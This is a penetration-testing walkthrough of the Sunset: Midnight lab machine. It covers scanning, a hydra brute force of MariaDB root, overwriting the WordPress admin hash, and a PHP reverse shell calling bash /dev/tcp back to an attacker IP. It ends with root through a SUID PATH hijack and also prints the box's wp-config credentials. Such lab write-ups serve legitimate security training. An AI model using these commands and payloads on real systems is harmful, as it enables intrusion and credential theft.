SUNSET-MIDNIGHT box walkthrough
Disclaimer
These notes exist only to help fellow practitioners learn. The sites below are used for study only; anything beyond that has nothing to do with the author. Do not cross the legal red line, or you bear the consequences yourself.
About the author: working in the network security field, currently a learner, honoured to be a sharer, aiming eventually to be a pioneer. It is fun and very worthwhile.
Homepage: @One_Blanks
- Official account: 泷羽Sec-Blanks
This walkthrough takes you through a realistic penetration environment. It does not hand you the answer; it leads you through information gathering and exploitation in full, stepping into the same pitfalls I hit. Real engagements are usually more demoralizing than this, and skill only comes from practice.
Contents
1. Host discovery + information gathering
(1) Host discovery
arp-scan -l
(ARP sweep of the local segment; the target answered as 192.168.1.135.)
(2) Set an environment variable
export ip=192.168.1.135
(so every later command can refer to the target as $ip)
(3) Port scan (all 65535 TCP ports at a high rate; accuracy comes in the next step)
nmap --min-rate 10000 -p- $ip
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
3306/tcp open mysql
(4) Service enumeration on the open ports
nmap -sS -sV -O -p22,80,3306 $ip
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp open http Apache httpd 2.4.38 ((Debian))
3306/tcp open mysql MariaDB 5.5.5-10.3.22
MAC Address: 00:50:56:3C:94:80 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
(5) Vulnerability script scan (the vuln NSE category; note the http-wordpress-users result, which already hands us the admin username)
nmap --script=vuln -p22,80,3306 $ip
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
| http-wordpress-users:
| Username found: admin
|_Search stopped at ID #25. Increase the upper limit if necessary with 'http-wordpress-users.limit'
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
| http-enum:
| /blog/: Blog
| /wp-login.php: Possible admin folder
| /wp-json: Possible admin folder
| /robots.txt: Robots file
| /readme.html: Wordpress version: 2
| /feed/: Wordpress version: 5.4.2
| /wp-includes/images/rss.png: Wordpress version 2.2 found.
| /wp-includes/js/jquery/suggest.js: Wordpress version 2.5 found.
| /wp-includes/images/blank.gif: Wordpress version 2.6 found.
| /wp-includes/js/comment-reply.js: Wordpress version 2.7 found.
| /wp-login.php: Wordpress login page.
| /wp-admin/upgrade.php: Wordpress login page.
| /readme.html: Interesting, a readme.
| /0/: Potentially interesting folder
| /contact/: Potentially interesting folder
|_ /home/: Potentially interesting folder
3306/tcp open mysql
MAC Address: 00:50:56:3C:94:80 (VMware)
Or, with nikto for a second opinion on the web server:
nikto -h 192.168.1.135
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 192.168.1.135
+ Target Hostname: 192.168.1.135
+ Target Port: 80
+ Start Time: 2025-04-07 00:47:58 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: Uncommon header 'x-redirect-by' found, with contents: WordPress.
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ Root page / redirects to: http://sunset-midnight/
+ /aCOYkcj5.axd: Drupal Link header found with value: <http://sunset-midnight/wp-json/>; rel="https://api.w.org/". See: https://www.drupal.org/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /robots.txt: contains 2 entries which should be manually viewed. See: https://developer.mozilla.org/en-US/docs/Glossary/Robots.txt
+ Apache/2.4.38 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /: Web Server returns a valid response with junk HTTP methods which may cause false positives.
+ /home/: This might be interesting.
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ /wp-links-opml.php: This WordPress script reveals the installed version.
+ /license.txt: License file found may identify site software.
+ /wp-app.log: Wordpress' wp-app.log may leak application/system details.
+ /wordpress/wp-app.log: Wordpress' wp-app.log may leak application/system details.
+ /wordpress/: A Wordpress installation was found.
+ /wp-login.php?action=register: Cookie wordpress_test_cookie created without the httponly flag. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies
+ /wp-content/uploads/: Directory indexing found.
+ /wp-content/uploads/: Wordpress uploads directory is browsable. This may reveal sensitive information.
+ /wp-login.php: Wordpress login found.
+ 8108 requests: 0 error(s) and 18 item(s) reported on remote host
+ End Time: 2025-04-07 00:50:01 (GMT-4) (123 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
2. Exploitation
(1) Port 22
N-day
┌──(root㉿kali)-[/home/kali/bc]
└─# searchsploit OpenSSH 7.9
Exploits: No Results
Shellcodes: No Results
Brute force
We know nothing about valid usernames yet, so skip this for now and collect information from the web side first.
(2) Port 80 web application
Access
Browsing to the IP does not show the site: the root page redirects to http://sunset-midnight/ (nikto noted this above), and that name does not resolve. Add a hosts mapping so the hostname resolves to the target IP:
Windows: edit C:\Windows\System32\drivers\etc\hosts
Linux: edit /etc/hosts
(add the line: 192.168.1.135 sunset-midnight)
After that the site loads normally, and it is a WordPress site.
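Two small shell helpers for the recon steps in section 1 and the hosts mapping just described, added here as an example and not part of the original walkthrough. The first pulls the open ports out of nmap's grepable output so the slow -sV/-O pass only touches those ports; the second turns the redirect hostname into the /etc/hosts line. Both operate on captured text, so they run without a target; the nmap sample inside is constructed to match this box, and the live usage at the bottom assumes nmap and curl are installed.

```shell
#!/bin/sh
# Added example, not code from the original walkthrough. Two text helpers for
# the recon steps above: pick the open ports out of nmap's grepable output
# (so the slow -sV/-O pass only touches those ports) and turn the redirect
# hostname into the /etc/hosts line. Both work on captured text, so they run
# without a target; the sample output below is constructed to match this box.

# Read nmap -oG output on stdin, print open TCP ports as "22,80,3306".
open_ports_from_gnmap() {
    # The Ports field looks like: 22/open/tcp//ssh///, 80/open/tcp//http///, ...
    sed -n 's/.*Ports: //p' \
      | tr ',' '\n' \
      | sed -n 's#^ *\([0-9][0-9]*\)/open/tcp.*#\1#p' \
      | sort -n -u \
      | paste -sd, -
}

# $1 = target IP, $2 = a "Location: http://host/" header line.
# Prints "IP host" for /etc/hosts; fails (exit 1) if no redirect host is found.
hosts_entry_from_redirect() {
    ip="$1"
    host=$(printf '%s\n' "$2" | tr -d '\r' \
        | sed -n 's#^[Ll]ocation: *https\{0,1\}://\([^/:]*\).*#\1#p')
    [ -n "$host" ] || return 1
    printf '%s %s\n' "$ip" "$host"
}

# Constructed sample of what `nmap --min-rate 10000 -p- -oG - $ip` prints
# for this machine (trimmed; a real run carries a few more header lines).
sample_gnmap() {
    cat <<'EOF'
# Nmap scan initiated as: nmap --min-rate 10000 -p- -oG - 192.168.1.135
Host: 192.168.1.135 ()  Status: Up
Host: 192.168.1.135 ()  Ports: 22/open/tcp//ssh///, 80/open/tcp//http///, 3306/open/tcp//mysql///   Ignored State: closed (65532)
# Nmap done
EOF
}

# Live usage (assumes nmap and curl are installed and $ip is set as above):
#   ports=$(nmap --min-rate 10000 -p- -oG - "$ip" | open_ports_from_gnmap)
#   nmap -sS -sV -O -p"$ports" "$ip"
#   hosts_entry_from_redirect "$ip" "$(curl -sI "http://$ip/" | grep -i '^Location:')" \
#       | sudo tee -a /etc/hosts
```

The redirect helper strips the carriage return that curl -I leaves on header lines and stops at a port suffix, so a Location of https://host:8443/... still yields just the hostname; it fails cleanly when the header is not a redirect, which is the case to check before appending anything to /etc/hosts.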
Visit http://sunset-midnight/robots.txt:
User-agent: *
Disallow: /wp-admin/
Allow: /wp-admin/admin-ajax.php
http://sunset-midnight/wp-login.php?redirect_to=http%3A%2F%2Fsunset-midnight%2Fwp-admin%2F&reauth=1 is the admin login page.
Nothing more to pick up by hand, so run wpscan:
wpscan --url http://sunset-midnight   (plain scan, no brute force yet)
[+] URL: http://sunset-midnight/ [192.168.1.135]
[+] Started: Mon Apr 7 01:23:38 2025
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.38 (Debian)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] robots.txt found: http://sunset-midnight/robots.txt
| Interesting Entries:
| - /wp-admin/
| - /wp-admin/admin-ajax.php
| Found By: Robots Txt (Aggressive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://sunset-midnight/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://sunset-midnight/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://sunset-midnight/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://sunset-midnight/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.4.2 identified (Insecure, released on 2020-06-10).
| Found By: Rss Generator (Passive Detection)
| - http://sunset-midnight/feed/, <generator>https://wordpress.org/?v=5.4.2</generator>
| - http://sunset-midnight/comments/feed/, <generator>https://wordpress.org/?v=5.4.2</generator>
[+] WordPress theme in use: twentyseventeen
| Location: http://sunset-midnight/wp-content/themes/twentyseventeen/
| Last Updated: 2024-11-12T00:00:00.000Z
| Readme: http://sunset-midnight/wp-content/themes/twentyseventeen/readme.txt
| [!] The version is out of date, the latest version is 3.8
| Style URL: http://sunset-midnight/wp-content/themes/twentyseventeen/style.css?ver=20190507
| Style Name: Twenty Seventeen
| Style URI: https://wordpress.org/themes/twentyseventeen/
| Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
| Confirmed By: Css Style In 404 Page (Passive Detection)
|
| Version: 2.3 (80% confidence)
| Found By: Style (Passive Detection)
| - http://sunset-midnight/wp-content/themes/twentyseventeen/style.css?ver=20190507, Match: 'Version: 2.3'
[+] Enumerating All Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)
[i] Plugin(s) Identified:
[+] simply-poll-master
| Location: http://sunset-midnight/wp-content/plugins/simply-poll-master/
|
| Found By: Urls In Homepage (Passive Detection)
| Confirmed By: Urls In 404 Page (Passive Detection)
|
| Version: 1.5 (100% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://sunset-midnight/wp-content/plugins/simply-poll-master/readme.txt
| Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
| - http://sunset-midnight/wp-content/plugins/simply-poll-master/readme.txt
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:01 <=========================================> (137 / 137) 100.00% Time: 00:00:01
[i] No Config Backups Found.
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Mon Apr 7 01:23:43 2025
[+] Requests Done: 172
[+] Cached Requests: 7
[+] Data Sent: 43.303 KB
[+] Data Received: 444.822 KB
[+] Memory used: 273.512 MB
[+] Elapsed time: 00:00:04
From this we have the admin user, so a password brute force is an option, and the version, 5.4.2, lets us look for N-days.
N-day: WPScan only prints vulnerability data when given an API token, which we do not have here, so this step yields nothing.
So try brute forcing, then move on to 3306.
wpscan --url http://sunset-midnight/ -P /usr/share/wordlists/rockyou.txt -U admin
The brute force found nothing, but 3306 delivered.
(3) Port 3306, the database
Here it comes down to brute force. MariaDB is reachable from the network and, as it turns out, lets root log in remotely, which is the real misconfiguration.
hydra -l root -P /usr/share/wordlists/rockyou.txt mysql://192.168.1.135
(if the wordlist is not there yet, run gunzip on rockyou.txt.gz in that directory first)
┌──(root㉿kali)-[/home/kali/bc]
└─# hydra -l root -P /usr/share/wordlists/rockyou.txt mysql://192.168.1.135
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-04-07 01:11:50
[INFO] Reduced number of tasks to 4 (mysql does not like many parallel connections)
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 4 tasks per 1 server, overall 4 tasks, 14344399 login tries (l:1/p:14344399), ~3586100 tries per task
[DATA] attacking mysql://192.168.1.135:3306/
[STATUS] 12.00 tries/min, 12 tries in 00:01h, 14344387 to do in 19922:46h, 4 active
[STATUS] 12.00 tries/min, 36 tries in 00:03h, 14344363 to do in 19922:44h, 4 active
[3306][mysql] host: 192.168.1.135 login: root password: robert
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-04-07 01:18:45
A valid pair: root / robert
mysql -h 192.168.1.135 -u root -p
The newer mysql client on my Kali threw an error here:
┌──(root㉿kali)-[/home/kali]
└─# mysql -h 192.168.1.135 -u root -p
Enter password:
ERROR 2026 (HY000): TLS/SSL error: SSL is required, but the server does not support it
mysql -h 192.168.1.135 -u root -p --ssl=0
(newer clients require TLS by default and this server does not offer it, so disable TLS for the session with --ssl=0, or --skip-ssl on a MariaDB client; the session is then unencrypted on the wire)
show databases;   list the databases
+--------------------+
| Database |
+--------------------+
| information_schema |
| mysql |
| performance_schema |
| wordpress_db |
+--------------------+
use wordpress_db;   select the database
show tables;   list its tables
+------------------------+
| Tables_in_wordpress_db |
+------------------------+
| wp_commentmeta |
| wp_comments |
| wp_links |
| wp_options |
| wp_postmeta |
| wp_posts |
| wp_sp_polls |
| wp_term_relationships |
| wp_term_taxonomy |
| wp_termmeta |
| wp_terms |
| wp_usermeta |
| wp_users |
+------------------------+
select * from wp_users;   dump the users table
+----+------------+------------------------------------+---------------+---------------------+------------------------+---------------------+---------------------+-------------+--------------+
| ID | user_login | user_pass | user_nicename | user_email | user_url | user_registered | user_activation_key | user_status | display_name |
+----+------------+------------------------------------+---------------+---------------------+------------------------+---------------------+---------------------+-------------+--------------+
| 1 | admin | $P$BaWk4oeAmrdn453hR6O6BvDqoF9yy6/ | admin | example@example.com | http://sunset-midnight | 2020-07-16 19:10:47 | | 0 | admin |
+----+------------+------------------------------------+---------------+---------------------+------------------------+---------------------+---------------------+-------------+--------------+
This is not plain MD5: the $P$ prefix marks a phpass portable hash (salted, iterated MD5; the 'B' after the prefix encodes 2^13 = 8192 rounds), which WordPress has used since 2.5. Plain-MD5 lookup sites therefore cannot match it, which is exactly what happens next:
pmd5.com
ttmd5.com
www.somd5.com
xmd5.com
https://hashes.com/zh/decrypt/hash
None of the online lookups cracked it. (The offline route would be hashcat -m 400, the phpass mode, but there is no need for it here.)
Since we already have root on the database, just overwrite the hash. WordPress still accepts a bare 32-character MD5 in user_pass for backward compatibility and re-hashes it with phpass on the next successful login, so MySQL's MD5() function is enough:
update wp_users set user_pass = MD5('123456') where ID=1;
Then open
http://sunset-midnight/wp-login.php?redirect_to=http%3A%2F%2Fsunset-midnight%2Fwp-admin%2F&reauth=1
and log in as admin / 123456. We are straight into the dashboard.
Now a PHP reverse shell:
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.1.133/4444 0>&1'");?>
(192.168.1.133 is the attacking Kali box.) Start the listener on Kali:
nc -nvlp 4444
Paste that line into a theme template from the admin side; the usual place is Appearance > Theme Editor, editing the active Twenty Seventeen theme's 404.php (wp-content/themes/twentyseventeen/404.php).
Requesting a path that does not exist, e.g. http://sunset-midnight/404.php, renders that template, the exec() fires, and the listener receives the shell.
3. Initial foothold
(the reverse shell above is the foothold; it lands in the WordPress web root)
4. Privilege escalation
ls
Look at the config first
cat wp-config.php
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'wordpress_db' );
/** MySQL database username */
define( 'DB_USER', 'jose' );
/** MySQL database password */
define( 'DB_PASSWORD', '645dc5a8871d2a4269d4cbe23f6ae103' );
/** MySQL hostname */
define( 'DB_HOST', 'localhost' );
/** Database Charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8' );
/** The Database Collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );
/**#@+
* Authentication Unique Keys and Salts.
*
* Change these to different unique phrases!
* You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
* You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
*
* @since 2.6.0
*/
define('AUTH_KEY', '9F#)Pk/=&SyQ/>UVRBXx$}e&>G@(+m6L|_{Emur&fv&fO_+wbJ`-6QnE_7hI|Y<p');
define('SECURE_AUTH_KEY', 'p#Eh5#4W~p4-Iue2M)H/?[dp`BS;$7o~Kb%F?&S-Zv=rH#;U%`9G#VR`l^,8j$M+');
define('LOGGED_IN_KEY', '0{YUw?X%j+ej-0du&FW@QkVP?b(#QsQfu[Q%<QS_Lpc1UI1|st:EJr)d*$g/iJ18');
define('NONCE_KEY', '%)thH*l;)A^S#8WQ!8TKAnQ;uNXNKv<f.|PyYijgztda70y-4m~DTyqr^X!$JwX#');
define('AUTH_SALT', '<Kd5.3^|yo:/fw2Y|PTb4!bU~5uRv7Z(n0;~jOXoO7MC]j/ICu[tY!)g4Oah-{oa');
define('SECURE_AUTH_SALT', 'dmYQvQ1Ap&z~JUHUaKR6]<rm7^ydGAp(/EH&+vrAi6cBpi?F7XKTc@Ahm:|h*wR;');
define('LOGGED_IN_SALT', '5+Iw-;-j+2rD3WgRtSM`!zDb5I%LLU0]Awk-Cma:f4xrJv%k~/@+TthXY_[JpjfK');
define('NONCE_SALT', 'iDo3}y9z;@c~a)ZLT:7|.ZCp-0sK4>T1p&%MhGt_TUu+HFpPjn-no`:8sI0BA);y');
/**#@-*/
/**
* WordPress Database Table prefix.
*
* You can have multiple installations in one database if you give each
* a unique prefix. Only numbers, letters, and underscores please!
*/
$table_prefix = 'wp_';
/**
* For developers: WordPress debugging mode.
*
* Change this to true to enable the display of notices during development.
* It is strongly recommended that plugin and theme developers use WP_DEBUG
* in their development environments.
*
* For information on other constants that can be used for debugging,
* visit the documentation.
*
* @link https://wordpress.org/support/article/debugging-in-wordpress/
*/
define( 'WP_DEBUG', false );
/* That's all, stop editing! Happy publishing. */
/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
define( 'ABSPATH', __DIR__ . '/' );
}
/** Sets up WordPress vars and included files. */
require_once ABSPATH . 'wp-settings.php';
User jose, password 645dc5a8871d2a4269d4cbe23f6ae103
The value looks like an MD5 digest, but it is the literal database password, so there is nothing to crack; try it as jose's system password directly:
su jose
password: 645dc5a8871d2a4269d4cbe23f6ae103
It works: the database password is reused as the Linux account password.
Upgrade to an interactive shell
python3 -c 'import pty; pty.spawn("/bin/bash")'
SUID binaries
find / -perm -u=s -ls 2>/dev/null
/usr/bin/status jumps out at once: it is not a standard system tool (dpkg -S /usr/bin/status would confirm that no package owns it).
jose@midnight:/home$ status
status
● ssh.service - OpenBSD Secure Shell server
Loaded: loaded (/lib/systemd/system/ssh.service; enabled; vendor preset: enabled)
Active: active (running) since Mon 2025-04-07 03:33:00 EDT; 1h 21min ago
Docs: man:sshd(8)
man:sshd_config(5)
Process: 539 ExecStartPre=/usr/sbin/sshd -t (code=exited, status=0/SUCCESS)
Main PID: 552 (sshd)
Tasks: 1 (limit: 1148)
Memory: 3.6M
CGroup: /system.slice/ssh.service
└─552 /usr/sbin/sshd -D
Apr 07 03:33:00 midnight systemd[1]: Starting OpenBSD Secure Shell server...
Apr 07 03:33:00 midnight sshd[552]: Server listening on 0.0.0.0 port 22.
Apr 07 03:33:00 midnight sshd[552]: Server listening on :: port 22.
Apr 07 03:33:00 midnight systemd[1]: Started OpenBSD Secure Shell server.
strings /usr/bin/status   (look for hard-coded strings in the binary)
jose@midnight:/home$ strings /usr/bin/status
strings /usr/bin/status
/lib64/ld-linux-x86-64.so.2
libc.so.6
setuid
printf
system
__cxa_finalize
setgid
__libc_start_main
GLIBC_2.2.5
_ITM_deregisterTMCloneTable
__gmon_start__
_ITM_registerTMCloneTable
u/UH
[]A\A]A^A_
Status of the SSH server:
service ssh status
;*3$"
GCC: (Debian 8.3.0-6) 8.3.0
crtstuff.c
deregister_tm_clones
__do_global_dtors_aux
completed.7325
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
status.c
__FRAME_END__
__init_array_end
_DYNAMIC
__init_array_start
__GNU_EH_FRAME_HDR
_GLOBAL_OFFSET_TABLE_
__libc_csu_fini
_ITM_deregisterTMCloneTable
_edata
system@@GLIBC_2.2.5
printf@@GLIBC_2.2.5
__libc_start_main@@GLIBC_2.2.5
__data_start
__gmon_start__
__dso_handle
_IO_stdin_used
__libc_csu_init
__bss_start
main
setgid@@GLIBC_2.2.5
__TMC_END__
_ITM_registerTMCloneTable
setuid@@GLIBC_2.2.5
__cxa_finalize@@GLIBC_2.2.5
.symtab
.strtab
.shstrtab
.interp
.note.ABI-tag
.note.gnu.build-id
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rela.dyn
.rela.plt
.init
.plt.got
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.dynamic
.got.plt
.data
.bss
.comment
We can see that the program imports setuid, setgid and system, and that it runs the command `service ssh status`. Because `service` is given as a bare name, the /bin/sh that system() spawns resolves it through $PATH, so a fake `service` placed earlier in PATH hijacks the call and runs with the binary's root privileges.
echo $PATH   note the original value first
Malicious script:
echo '/bin/bash -p' > /tmp/service
chmod +x /tmp/service
Hijack PATH:
export PATH=/tmp:$PATH
Run:
/usr/bin/status
id now shows that we are root (bash -p keeps the elevated effective uid instead of dropping it).
Afterwards, set PATH back to its original value.
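The hijack above, reproduced against a stand-in for /usr/bin/status so the mechanism can be checked without root or the target. This is an added example, not code from the original walkthrough; it assumes only that system() runs its command through /bin/sh (which is what the C library does) and emulates the SUID binary with a plain `sh -c`, so the fake `service` merely announces itself instead of spawning a root shell.

```shell
#!/bin/sh
# Added example, not code from the original walkthrough. It reproduces the
# PATH hijack against a stand-in for /usr/bin/status so the mechanism can be
# checked without root or the target. The real binary is SUID root and calls
# system("service ssh status"); system() hands that string to /bin/sh, which
# looks up the bare word "service" through $PATH. Here the victim is emulated
# with `sh -c`, which is exactly what system() does underneath.

# Plant an executable named "service" in a writable directory.
# $1 = directory, $2 = shell command the fake should run.
plant_fake_service() {
    mkdir -p "$1"
    printf '#!/bin/sh\n%s\n' "$2" > "$1/service"
    chmod +x "$1/service"
}

# Run a command the way system() would, with $1 prepended to PATH for that
# single invocation only (so the caller's own PATH is never modified and
# there is nothing to restore afterwards).
# Prints which "service" the shell resolved, then the command's output.
run_with_hijacked_path() {
    PATH="$1:$PATH" sh -c "command -v service; $2"
}

# End-to-end demo: the fake only announces itself. Against the real SUID
# binary the payload would be "/bin/bash -p" (-p stops bash from dropping
# the effective uid back to the caller's).
hijack_demo() {
    tmpd=$(mktemp -d)
    plant_fake_service "$tmpd" 'echo HIJACKED'
    run_with_hijacked_path "$tmpd" 'service ssh status'
    rm -rf "$tmpd"
}

# Check to run on the target before relying on this: the binary must invoke
# "service" without a full path. A grep on the strings output is enough:
#   strings /usr/bin/status | grep -n '^service '
```

Scoping the modified PATH to the one invocation, as run_with_hijacked_path does, is the tidier form of the export-then-restore sequence in the walkthrough: the attacking shell's PATH is never touched, so nothing else started from that shell picks up /tmp first.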